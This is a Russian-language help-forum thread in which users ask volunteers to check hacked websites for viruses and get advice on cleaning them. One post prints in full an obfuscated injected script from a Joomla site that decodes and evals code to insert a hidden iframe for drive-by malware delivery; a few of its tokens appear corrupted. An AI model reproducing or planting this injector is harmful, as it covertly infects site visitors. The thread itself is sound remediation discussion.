Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Efim

Активный пользователь
Сообщения
12
Реакции
0
Баллы
381
Да, нет пока все вроде нормально, сюда написал что бы проверили на всякий случай, поскольку проверив комп все оказалось нормально.
 

dkzfiles

Активный пользователь
Сообщения
4
Реакции
0
Баллы
301
Привет!
Люди добрые, помогите разобраться. Яндекс кричит про вредоносный код. Все файлы сайта хттп://loadboard.ru проверены и каспером и drweb и avast и sophos и mcafee. Все чисто. Сегодня код найден, завтра нет. Скрипт следующего содержания:
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var wij=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var bauu=r.cssRules||r.rules;for(var bpio=0;bpio<bauu.length;bpio++){var urnz=bauu.item?bauu.item(bpio):bauu[bpio];if(!urnz.selectorText.match(/#c(\d+)/))continue;wij=urnz.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};} puny=new Date(2010,11,3,2,21,4);t=puny.getSeconds();var rpzc=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,40t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/4/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc);hx.call(nqwy);mv+=hx(nqwy);} qf(mv);</script> </body> </html>

Спасибо.
 
Последнее редактирование модератором:

Arbitr

Ассоциация VN
VIP
Сообщения
3,619
Реакции
1,633
Баллы
593
если не ошибаюсь ругается на кусок из кода идущий с рекламой игры.. скопируйте плиз код из файла scripts/ads папка ads
то есть не папка скрипт вашей cms joomla а именно то что пришло с рекламой
 

dkzfiles

Активный пользователь
Сообщения
4
Реакции
0
Баллы
301
прошу прощения за безграмотность, как это можно сделать? через FTP или firebug? и если возможно подробнее.. если через firebug, интуиция подсказывает, что копать нужно в этом направлении?
скриншот: хттп://imglink.ru/show-image.php?id=3593435538694bba3b26f566c666ee4f
 

Arbitr

Ассоциация VN
VIP
Сообщения
3,619
Реакции
1,633
Баллы
593
да, как понимаю айс код туда инклудится банер..и по ходу траблики с ним..
плюс там заметил странную картинку 12 пикселов белый квадрат *** i.png
 

dkzfiles

Активный пользователь
Сообщения
4
Реакции
0
Баллы
301
наткнулся на статью про Trojan-Downloader.HTML.Agent.wy, он же Troj/Iframe-IW здесь: хттп://www.mpcontrol.ru/index.php?option=com_content&view=article&id=72%3A-xmega-&catid=1&Itemid=36
По рекомендации открыл и сравнил с оригиналом файл \libraries\joomla\utilities\compat\compat.php
Он явно отличался. Перезаписал оригиналом, жду от яндекса новостей, потом отпишу помогло или нет.
 

Arbitr

Ассоциация VN
VIP
Сообщения
3,619
Реакции
1,633
Баллы
593
да оно.. не забудьте сменить пароль и проверить комп на вируса..
 

Гумер

Активный пользователь
Сообщения
1
Реакции
0
Баллы
301
Добрый день.

В последнее время хттп://colorandcode.ru начал блокироваться.

При проверке выдает

Avast JS:ScriptIP-inf [Trj]
GData JS:ScriptIP-inf
Ikarus JS.ScriptIP

а остальные показывают что нет вируса, например
ESET-NOD32 вирусов нет
 

dkzfiles

Активный пользователь
Сообщения
4
Реакции
0
Баллы
301
Arbitr, через 3 суток сайт выплыл в яндексе без пометок, вот уже неделя все нормально, причина была в compat.php. Пароли сменил с параноидальной длиной, поставил компонент против sql инъекций и всяких других хреней. Поймать бы того кто это сделал да и отрубить голову.
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
dkzfiles, это делал скорее всего скрипт. Ручным взломом занимаются или дети безголовые по инструкции либо под заказ за большие деньги.
 

Кирилл

Команда форума
Администратор
Сообщения
14,080
Реакции
6,133
Баллы
993
В разделе вин 7 была выложена ссылка на victоria, хттп://hdd-911.com/index.php?option=content&task=view&id=27&Itemid=27
Когда перехожу с компа по ссылке то все нормально.
Если с планшетника то сразу срабатывает перенаправление,ставлю антивирь выдает как малварьный ресурс.
При перенаправлении идет предложение все скачать,все обновить...
перенаправление на h t t p://bq-update.com/

На планшете вирья вроде нет-сканировал раными утилами,смотрел потроха системы и процессы,ничего подозрительного+проблема только на том сайте.
картинки прилагаю
 

Вложения

Последнее редактирование модератором:

shestale

Ассоциация VN/VIP
Преподаватель
Сообщения
9,705
Реакции
4,654
Баллы
753
Проверь хотя бы хостс, т.к. сылка нормальная, и проблема имхо у тебя на планшетнике.
 

Кирилл

Команда форума
Администратор
Сообщения
14,080
Реакции
6,133
Баллы
993
shestale, тут на анроиде нет хостса.
это не шиндос
с другими сайтами все нормально,проблема только с этим.

Добавлено через 35 минут 47 секунд
по описаниям эта штука атакует сайты и внедряет J2ME/TrojanSMS.Agent.DL через мобильные браузеры.
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Сайт заражен.

Есть два варианта:
1. Админ зарабатывает на мобильном трафике
2. Сайт взломан и перенаправляет все мобильные устройства на вредоносный сайт. Смотреть .htaccess нужно.
 

Кирилл

Команда форума
Администратор
Сообщения
14,080
Реакции
6,133
Баллы
993
щас гляну.
Сайт временно исключать из публикуемых ссылок?

Добавлено через 8 минут 16 секунд
Смотреть .htaccess нужно.
.htaccess перепутал с андройдовскими файлами.
кстати вирье искать несложно-в системе не так уж и много файлов,левые сразу видно.
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Исключай. Я не нашел контакты админа того сайта....

Добавлено через 22 секунды
Кстати самое важное можно у нас зазеркалить.
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,650
Реакции
5,901
Баллы
1,008

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203

S10

Активный пользователь
Сообщения
23
Реакции
3
Баллы
383
Приветствую!
Подскажите, пожалуйста, как решить данную проблему:
На поддомене моего сайта обнаружен вирус, который идентифицируется Авастом как JS: cluder [trj]. Яндекс также прислал письмо о наличии вредоносного кода на этом поддомене.

Поддомен:
хттп://tournament.rhl-mod.ru

Заранее благодарю!
 
Сверху Снизу